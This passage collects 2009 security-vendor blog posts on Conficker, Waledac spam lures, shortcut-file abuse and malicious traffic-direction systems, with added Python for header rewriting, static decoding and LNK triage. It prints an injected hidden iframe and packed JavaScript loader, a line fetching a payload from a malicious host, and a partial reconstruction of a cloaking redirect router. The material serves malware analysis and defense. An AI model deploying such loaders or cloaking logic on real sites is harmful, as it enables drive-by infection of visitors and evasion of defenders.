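# The date we want the malware to believe; constructed for this example.
TARGET = datetime(2009, 4, 1, 12, 0, 0, tzinfo=timezone.utc)

# Matches the Date header at the start of a line without consuming the CR.
DATE_RE = re.compile(rb"^(Date:[ \t]*)([^\r\n]*)", re.IGNORECASE | re.MULTILINE)


def split_response(raw: bytes):
    """Split a raw HTTP response into (header block, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    return head, body


def observed_date(raw: bytes) -> datetime:
    """What a client that reads the Date header (as the time check does) concludes."""
    head, _ = split_response(raw)
    m = DATE_RE.search(head)
    if not m:
        raise ValueError("response carries no Date header")
    return parsedate_to_datetime(m.group(2).decode("ascii"))


def rewrite_date(raw: bytes, when: datetime = TARGET) -> bytes:
    """Return the response with its Date header replaced (or added) so the
    reader sees `when`. Body and all other headers are left untouched."""
    head, body = split_response(raw)
    value = format_datetime(when, usegmt=True).encode("ascii")   # RFC 1123 form
    if DATE_RE.search(head):
        head = DATE_RE.sub(lambda m: m.group(1) + value, head, count=1)
    else:
        head += b"\r\nDate: " + value
    return head + b"\r\n\r\n" + body


# Constructed responses: one as a web server would send it a week before
# the deadline, one with no Date header at all.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Date: Tue, 24 Mar 2009 10:00:00 GMT\r\n"
                   b"Server: Apache\r\n"
                   b"Content-Length: 5\r\n"
                   b"\r\n"
                   b"hello")
NO_DATE_RESPONSE = b"HTTP/1.1 200 OK\r\nServer: nginx\r\n\r\nhello"

if __name__ == "__main__":
    print("before:", observed_date(SAMPLE_RESPONSE))
    print("after: ", observed_date(rewrite_date(SAMPLE_RESPONSE)))
    print("added: ", observed_date(rewrite_date(NO_DATE_RESPONSE)))
```

In the testbed this rewrite sits on the packet-mangling box between the infected host and the Internet, applied to every HTTP response regardless of which of the polled sites it came from, so the malware gets the same answer no matter which time source it picks.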

There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer discovery packets, and found patterns in both the requests and responses. These patterns are valid for both the pre-April 1st and April 1st UDP scans. Based on this, we have incorporated a new heuristic into our latest Network Security Platform signature set, 5.1.16.15 or 4.1.46.16.

McAfee Network Security Platform (IntruShield) customers will see the following alerts:

  • WORM: W32/Conficker.C Activity Detected
  • HTTP: Suspicious Time Check Detected

The figure below shows the alert viewer drilled down by a source IP that has generated the "WORM: W32/Conficker.C Activity Detected" alert.

 (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

Conficker Activation On April 1st

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats, and so far we have not observed any significant activity on the domains it is polling. Even so, please remain vigilant and watch this space for further updates on the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

Another day hunting malware…

Don't you just love it when legitimate obfuscated JavaScript is mixed with malicious JavaScript?
And when the malicious script is chained through several redirections, Referer checks, exploits and other malware?

So, here is the story…
Once upon a time a user was searching Google for a service and found a site that fit the need…
The site is an innocent (until proven otherwise) website that has existed for some years to advertise a specific type of service.
It uses all those fancy (and legitimate) JavaScript libraries to give the pages some special effects.

Indeed, real special effects… because once you get there, all the magic happens… :)

From the user's standpoint, he just went to the website, let's call it specialeffectsservices.domain, and suddenly his machine was owned and the AV started popping up alerts…

A closer look reveals what happened:
Among all the .js files on the website, one contained, besides the regular fancy JavaScript, something not so innocent…

The script was obfuscated with the well-known eval(function(p,a,c,k,e,d){...}) packer.

I deobfuscated it and found the following iframe:
[iframe width=1 height=1 src='hXXp://[REMOVED]-atm.net/b2b/' style='display:none'></iframe]

If you go to the [REMOVED]-atm.net website itself, you will find this nice message:

H@K3D 8Y J@KE-M1L

If you go to [REMOVED]-atm.net/b2b you will be redirected to files[REMOVED].net.

files[REMOVED].net also contains a folder called b2b with another obfuscated script (which is only served if you arrive with the right Referer):

[SCRIPT LANGUAGE="JavaScript"]
function spl(){var
crypted="60!83!99!114!105!112!116!32!76!97!110!103!117!97!103
!101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!
41!59!32
.
.
.
3!125!125!32!13!10!60!47!83!99!114!105!112!116!62!";var
i,out="",temp="",c=0;l=crypted.length;do{while(crypted.charAt(c)!='!')temp=temp+crypted.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp="";}while(c<=crypted.length-1);document.write(out);}
spl();
[/SCRIPT]

Once I managed to deobfuscate it, it turned out to lead to yet another redirect, on the same site:

q.open('GET','hXXp://files[REMOVED].net/b2b/load/',0);
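The spl() routine above is a one-trick encoder: every character code is written out in decimal with "!" as the separator, and the script rebuilds the text with String.fromCharCode() and hands it to document.write(). You do not need a browser, or eval(), to undo that. The Python below is an added example of a static decoder (not code from the post); it includes the inverse encoder only to build a constructed test payload, the domain files.invalid in that payload being a stand-in for the redacted one, and defangs any URL it recovers.

```python
import re

# Visible prefix of the crypted string shown in the post (the middle of the string is elided there).
CRYPTED_PREFIX = ("60!83!99!114!105!112!116!32!76!97!110!103!117!97!103"
                  "!101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!"
                  "41!59!32")


def decode_bang_string(crypted):
    """Static equivalent of spl(): each '!'-separated decimal is one character code.
    Nothing is executed, so this is safe to run on hostile input."""
    out = []
    for token in crypted.split("!"):
        if token == "":
            continue            # the real string ends in '!', which yields an empty token
        if not token.isdigit():
            raise ValueError(f"unexpected token {token!r}")
        out.append(chr(int(token)))
    return "".join(out)


def encode_bang_string(text):
    """Inverse of decode_bang_string, used here only to build a constructed test payload."""
    return "!".join(str(ord(ch)) for ch in text) + "!"


def extract_crypted(script_text):
    """Pull every crypted=\"...\" literal out of a script without executing it
    (straight and curly quotes are both accepted, since pasted samples often carry the latter)."""
    return re.findall(r"crypted\s*=\s*[\"'“”]([0-9!]+)[\"'“”]", script_text)


def extract_urls(text):
    """Find http(s) URLs in decoded output and defang them (http -> hXXp) for safe reporting."""
    return [u.replace("http", "hXXp", 1) for u in re.findall(r"https?://[^\s'\"<>]+", text)]


if __name__ == "__main__":
    print(repr(decode_bang_string(CRYPTED_PREFIX)))   # the start of the hidden <Script> block
```

Running it on the visible prefix already gives away what the payload is: an inline script block whose first statement is a function call. The rest of the string is elided in the post, so the final redirect URL has to come from the full sample, which is what the q.open() line above shows.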

The /load path pushes a PE file onto the user's machine, usually dropped in C:\ under the name T.exe.

Of course it does not stop there…:)

T.exe is a downloader, which then fetches two additional files from the same domain plus another one from hansali[REMOVED].com.

One more detail: files[REMOVED].net is also the C&C server for the malware that gets installed.

And yes, we detect them all…:)

W32/Conficker: Much Ado About Nothing?

In the run-up to April 1, the media spotlight on the latest Conficker worm variant has reached fever pitch. From being touted as an "April Fool's joke" to outrageous headlines such as "Millions of computers expected to be destroyed", no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the more recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has consistently turned out to be a damp squib.

What happens on April Fool's Day is anyone's guess. Although we still don't know the real intent of the Conficker authors, they have consistently improved the worm, adding new functionality and anti-debugging tricks with every released variant. To resist the Conficker Cabal initiative, which recently blocked the domain registrations associated with the earlier Conficker A and B variants, the authors upped the randomly generated domain count from 250 per day to 50,000 per day, of which each infected host polls only a random sample. The intent behind generating so many candidate domains is to make it extremely difficult for security researchers to pre-register or monitor every site that could potentially host a payload for the worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

Breaking News: Waledac Terror Attack in a City Near You

Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example what a user from New York would see; other users would see the same message but with their local city being “attacked”:

The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

The Waledac/Storm authors try to keep their botnet running and always craft new social-engineering tricks to fool unsuspecting users into following their lure. As always, the best advice is to not click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that "curiosity killed the cat."

McAfee Monthly Spam Report for March

The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.

Replica-watch spam has taken over the number one position for holiday spam.

Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?

Putting a dollar value on productivity lost due to spam.

The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

Malware Riding on the Tides of the Economic Crisis

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want to fool exactly those people who are trying to save some money these days. Spam mails promoting bargains that supposedly help in the recession are hitting inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

New Valentine Scam on the Loose

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture of two adorable Shih Tzu puppies wishes you a Happy Valentine's Day. The text of the lure advertises a "Valentine Devkit" named loveexe.exe or start.exe. Regular readers can guess it already: this is a social-engineering trick to convince users to download the real threat. Don't click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

Cybercrime, Online Threats, and the Recession

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Counting Malware

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files, which confuses many people. Drivers can be written very specifically, say one driver for one sample, but that's not very effective. Most drivers are written to generically detect many samples: one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is far higher than the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget's blog as well.

Initially VirusScan focused just on true self-replicating viruses, mainly 16-bit MS-DOS (.com/.exe) viruses as well as boot viruses, which were prevalent then and some of which still are today. Malware has since spread into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (PE-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware, password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift among malware authors. The first malware authors were hobbyists, writing to prove it could be done, but today we mainly see malware that's going after the money: password stealers and the like. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

Chinese Zombie Count Falls but Still Outnumbers Those in U.S.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It's not clear what is going on in China, but the vast number of computers that were under zombie control are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Abusing Shortcut files

Shortcuts, or LNK files, are small binary files that hold the path to an application, sometimes with optional parameters. They exist to launch applications and are placed where users can reach them easily, such as the desktop and application launchers. LNK files are also placed in the Startup folder to run automatically at boot. This indirect way of running applications is attractive to malware authors because shortcuts have never been called out to most users' attention as a security risk the way executable files have. At Avert Labs we have recently seen malware abusing shortcut files to launch malicious files or scripts in several different ways. Here are some of the methods we have seen:

  1. Shortcut files linking to malware files
    This is an easy way to launch malware, either through a user's action or upon reboot. These LNK files are created on the desktop, on network shares, and even in Startup folders. One of the many variants of the Spy-Agent.bw trojan is known to use shortcuts this way.

  2. Parasitic infection of shortcuts
    We have seen the W32/Mokaksu virus modify every LNK file on the desktop, prepending the path of the malware file to the original target path.

    The example above is the shortcut to Adobe Acrobat Reader after infection. The path to the malicious "Config.Msi.exe" (in the red box) has been inserted before the original target "AcroRd32.exe" (in the yellow box), so the original target is now passed as a parameter to the malware. Clicking the shortcut runs W32/Mokaksu, which then launches the original application while staying in the background. The user only sees the application the shortcut was meant to open, which makes the infection much harder to notice.

  3. Scripts in the shortcuts
    Instead of linking to a trojan executable, a shortcut can carry a command line for "cmd.exe". The Downloader-BMF trojan is such a case.

    When the user clicks one of these LNK files, the command line silently writes an ftp script and runs it to fetch VBS scripts from FTP servers; those VBS scripts then download the trojan executables.

In the first two cases the shortcut is merely a way of launching malware, whereas in the last case the LNK file is a standalone malicious file: no other malicious executable is needed, only the legitimate "cmd.exe". LNK files of this type can be attached to emails or hosted on websites, so we need to be more careful with them. Users can easily inspect a shortcut through its Properties dialog or by viewing the file in a hex editor.
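Inspecting shortcuts one at a time in a hex editor does not scale, but the fields that matter for all three cases above live in well-defined places in the Shell Link format: the target path in the LinkInfo block and the command line in the COMMAND_LINE_ARGUMENTS string. The Python below is an added example, not a tool from the post: a minimal parser for those fields and a triage rule that flags a script host as target (case 3) or an executable path hidden in the arguments (the W32/Mokaksu chaining of case 2). Because no real LNK files are on the page, it also includes a builder that emits constructed samples; the paths in the samples, and every script host other than cmd.exe in SCRIPT_HOSTS, are this example's assumptions.

```python
import struct

# Bytes 0..19 of every Shell Link: HeaderSize (0x4C) then the LinkCLSID {00021401-...-000000000046}.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# LinkFlags bits; the StringData sections follow the header in exactly this order.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION = (
    1 << 2, 1 << 3, 1 << 4, 1 << 5, 1 << 6)
IS_UNICODE = 1 << 7
STRING_SECTIONS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                   ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                   ("icon_location", HAS_ICON_LOCATION))

# The post names only cmd.exe; the other hosts are an assumption added for this example.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def build_lnk(local_base_path, arguments=None):
    """Build a minimal .lnk: header + LinkInfo carrying LocalBasePath + optional
    COMMAND_LINE_ARGUMENTS. Constructed sample data, not a file from the post."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = LNK_MAGIC + struct.pack("<II", flags, 0x20)   # LinkFlags, FileAttributes (ARCHIVE)
    header += b"\x00" * 24                                  # creation/access/write FILETIMEs
    header += struct.pack("<IiIH", 0, 0, 1, 0)              # FileSize, IconIndex, ShowCommand, HotKey
    header += b"\x00" * 10                                  # Reserved1/2/3
    path = local_base_path.encode("ascii") + b"\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # fixed drive, empty label
    lbp_off = 0x1C + len(volume_id)                          # LocalBasePath follows the VolumeID
    suffix_off = lbp_off + len(path)                         # empty CommonPathSuffix after it
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 1, 0x1C, lbp_off, 0, suffix_off)
    data = header + link_info + volume_id + path + b"\x00"
    if arguments is not None:
        data += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return data


def parse_lnk(data):
    """Return (LocalBasePath or None, dict of StringData sections) from raw LNK bytes."""
    if data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize is a 2-byte prefix; skip the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINK_INFO:
        size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 1:                          # VolumeIDAndLocalBasePath: NUL-terminated path
            start = pos + lbp_off
            target = data[start:data.index(b"\x00", start)].decode("latin-1")
        pos += size
    strings = {}
    for name, bit in STRING_SECTIONS:             # CountCharacters (2 bytes) then the characters
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            strings[name] = data[pos:pos + count * width].decode(
                "utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    return target, strings


def triage_lnk(data):
    """Return (target, arguments, reasons); a non-empty reasons list means 'look closer'."""
    target, strings = parse_lnk(data)
    args = strings.get("arguments", "")
    shown = target or strings.get("relative_path", "")
    basename = shown.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    reasons = []
    if basename in SCRIPT_HOSTS:
        reasons.append(f"target is a script host ({basename}); the payload is in the arguments")
    if ".exe" in args.lower():
        reasons.append("arguments carry an executable path (the Mokaksu chaining pattern)")
    return target, args, reasons


if __name__ == "__main__":
    infected = build_lnk(r"C:\Windows\Config.Msi.exe", r"C:\Program Files\Adobe\Reader\AcroRd32.exe")
    print(triage_lnk(infected))
```

The parser deliberately skips the LinkTargetIDList rather than decoding it, so a shortcut whose only target is in the IDList (no LinkInfo) comes back with target None and is judged on its relative path and arguments alone; a full triage tool would also walk the IDList and the EXTRA_DATA blocks that follow the strings.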

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

Mac Trojans Follow Successful Windows Path

It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up with a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for "McAfee" on torrent sites, you will find plenty of copies with serial numbers; but you won't know whether what you get is a Trojanized version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojanized versions of pirated Mac applications.

Take care — you often get what you pay for. ;)

The McAfee 2009 Threat Predictions

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Don’t worry, Obama did not refuse to be a president!

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an inadequately protected PC, you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done, and it is hosted on a botnet using the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

McAfee Monthly Spam Report Debuts

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

Inside The Malicious Traffic Business

The Web's classic social-engineering trick, the "missing video codec", tries to lure people into clicking on links or downloading and installing an executable which pretends to be the application needed to watch the movie. The animated picture below is such an example: at first glance, it looks like a typical embedded video that is unable to load. The "picture" states that you have to click on it in order to see the movie. And here the lure begins. In this blog entry we'll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called "Traffic Management System". In this case, if you load the URL several times, the destination rotates, and after too many retries you will always be redirected to the homepage of Google. The system remembers your IP address on the server side for a certain time period. After that time, or when you simply use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for "incoming traffic" that result in different "outgoing traffic" based on various restrictions. For example, geolocation could be used to redirect visitors from one country to one location while visitors from another country are redirected elsewhere; think of localized campaigns targeting the language spoken in each country. So users from the United States will not be redirected to a French phishing website, and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the Referer header. So, let's say, only visitors arriving with a Referer from Google will be redirected to a malicious website, and only as long as the visitor's IP address does not fall into well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.
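To make the cloaking concrete, here is an added Python reconstruction of the routing logic described above (not code from the post, nor from any real traffic management system): campaign IDs taken from the in.cgi query string, rules keyed on visitor country, Referer and source network, a per-IP hit counter, and a 302 to a decoy for everyone who fails. All rules, addresses and destinations are constructed; the decoy is google.com because that is where the post saw surplus visits land, and 198.51.100.0/24 stands in for a security vendor's range.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlparse


class Rule:
    """One 'incoming -> outgoing' rule: campaign, restrictions, destination."""

    def __init__(self, campaign, destination, countries=None,
                 referer_contains=None, blocked_nets=()):
        self.campaign = campaign
        self.destination = destination
        self.countries = set(countries) if countries else None
        self.referer_contains = referer_contains
        self.blocked_nets = [ipaddress.ip_network(n) for n in blocked_nets]

    def matches(self, ip, referer, country):
        if self.countries is not None and country not in self.countries:
            return False
        if self.referer_contains is not None and self.referer_contains not in (referer or ""):
            return False
        if any(ip in net for net in self.blocked_nets):     # e.g. a security vendor's range
            return False
        return True


class TrafficManager:
    """Server-side 302 router with per-IP memory. Visitors that match no rule, or that have
    already been seen max_hits times, get a harmless decoy instead of the exploit server."""

    def __init__(self, rules, max_hits=3, decoy="http://www.google.com/"):
        self.rules = defaultdict(list)
        for rule in rules:
            self.rules[rule.campaign].append(rule)
        self.max_hits = max_hits
        self.decoy = decoy
        self.hits = defaultdict(int)          # the server-side IP memory the post describes

    @staticmethod
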